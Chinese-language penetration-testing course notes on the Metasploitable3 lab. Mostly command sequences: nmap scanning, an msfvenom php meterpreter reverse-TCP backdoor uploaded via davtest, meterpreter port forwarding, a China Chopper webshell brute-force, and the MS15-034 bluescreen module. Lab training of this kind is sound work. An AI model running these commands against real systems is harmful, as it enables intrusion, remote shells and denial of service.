5期-Metasploitable3专题课程

metasploitable2基于ubantu的渗透演练环境。Rapid7官方长时间未更新,导致跟不上当前的节奏。metasploitable3出世。

metasploitable2配合metasploit的模块进行使用,速度很快。

metasploitable3更加难被攻破,有些漏洞在metasploit中没有漏洞利用模块,需要测试人员自己挖掘。

一台metasploitable是不够用的,真实攻击中都会牵连到很多服务器和计算机,它可以扩展,将metasploitable3安装到多台终端内,建立相关节点。

以下部分是渗透例子之一:从用nmap发现靶机存在多少端口,然后利用kali自带的DAVtest检测是否存在上传漏洞,到生成payload,到打开msf,加载exploit/multi/handler模块,设置好本地的端口与地址

推荐参考资料:https://jingyan.baidu.com/article/7f766daf9cced24100e1d046.html    这是对win7系统的攻击

面对靶机时,踩点:nmap网络扫描工具      【kali nmap的使用】

nmap -sS -sV -v -n -p- -oX demon.xml 192.168.1.151      【内网靶机不需要解析DNS】 

扫描结果关注到8585端口   存在 http   php   dav等应用     【对扫描结果的解读】

DAVTest上传测试的可执行文件,渗透测试快,轻松确定是否启用DAV服务攻击。      【漏洞测试】

msfvenom -p php/meterpreter_reverse_tcp  LHOST=192.168.1.152 LPORT=5555 -f raw >davtext.php    【生成反向链接攻击载荷,后门】

msfconsole                   【生成载荷以后,本地也要启动服务】

msf > use exploit/multi/handler                          【生成载荷以后,本地也要启动服务】

set PAYLOAD php/meterpreter_reverse_tcp              【生成载荷以后,本地也要启动服务】

show options                     【看一些设置有些什么东西】

set LHOST 192.168.1.152      

set LPORT 5555                【设置一下,跟载荷对应上】

davtest               【看一下帮助信息,用于生成以下命令】

davtest -url http://192.168.1.151:8585/uploads -uploadfile davtest.php -uploadloc DavTestDirXp317s2YNZmKZKU/demon.php  【上传攻击载荷到靶机】

exploit         【处于监听状态,靶机一点文件这个地方就会弹出meterpreter会话】

help      【看一下meterpreter的帮助信息】

shell       【跟dos命令差不多】

rdesktop 192.168.1.151:3389           【手动链接一下远程桌面,看看有没有防火墙】

portfwd -h           【看一下meterpreter的端口转发帮助信息】

portfwd add -l 7777 -p 3389 -r 192.168.1.151       【将本机的7777端口转发到目标机的3389端口】

rdesktop   127.0.0.1:7777                【本地转发设置好了以后,访问本地就等于访问了目标机,这就是转发的情况体现】

meterpreter > background       【退出】

msf exploit(handler) >  back    【退出】

msf > services 

msf > workspace  -a davtest     【创建一个工作区】

msf > db_                【看一下数据库功能】

msf > db_import demon.xml   【数据库导入看一下扫描结果的报告】

msf > services  【看一下扫描结果的报告】

ssh -L 3389:loaclhost:3389 [email protected]       【将本机3389转发到对方3389,这里需要寻找ssh的账号密码】

nmap -p 3389 192.168.1.151           【扫描一下3389】

nmap -p 3389 127.0.0.1         【扫描一下本机的3389】

rdesktop   127.0.0.1:3389        【设置好本地的端口转发后,直接访问本地就等于访问目标机器的IP+端口】

官方wiki      无语了,中国菜刀都被他们看见了。

https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities

1.chinese caidao   ----中国菜刀,加入了中国菜刀元素:一句话木马       位置:http://localhost/caidao.asp

2.80端口 --http    MS15-034/CVE-2015-1635  HTTP远程代码执行漏洞(远程蓝屏代码)(远程溢出漏洞)

微软IIS 6.0以上的windows server 2008 R2/2012/2012 R2以及windows 7/8/8.1系统都会受到这个漏洞影响

模块位置   msf:use  auxiliary/dos/http/ms15_034_ulonglongadd 

进阶:如果找到其他应用软件的各种漏洞利用模块,如上,要弄一个人将变得极其简单化。   

【危害还是非常大的,不要玩火,不得攻击他人。打不过你报警来凑】   

msf > search caidao                 【漏洞利用模块举例】

msf > use auxiliary/scanner/http/caidao_bruteforce_login                  【菜刀扫描模块】

show options       【查看设置】

set RHOSTS 192.168.1.151          【设置目标机】

set THREADS 10   【设置线程】

set TARGETURI /caidao.asp

run            

search ms 15_034      【搜索远程蓝屏代码漏洞编号】

use auxiliary/dos/http/ms15_034_ulonglongadd          【执行蓝屏代码漏洞的载荷模块】

show options       

set RHOSTS 192.168.1.151  

exploit             【服务器马上蓝屏】

其他参考资料

hacking metasploitable 2 

http://www.youtube.com/watch?v=jDqmEY_3zY&t=1625s&index=3&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD

www.youtube.com/watch?v=JoV1aSuy1XU&index=4&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD

www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&t=33393s&index=1

MSF精华合集      ZANYAR MATRIX发布的

www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&index=1&spfreload=10

书籍   

菜鸟腾飞 :metasploit渗透测试平台之应用 --飞飞  

T00LS metasploit  第一季度 第二季   ---羽翼

猜你喜欢

转载自www.cnblogs.com/sec875/p/10801489.html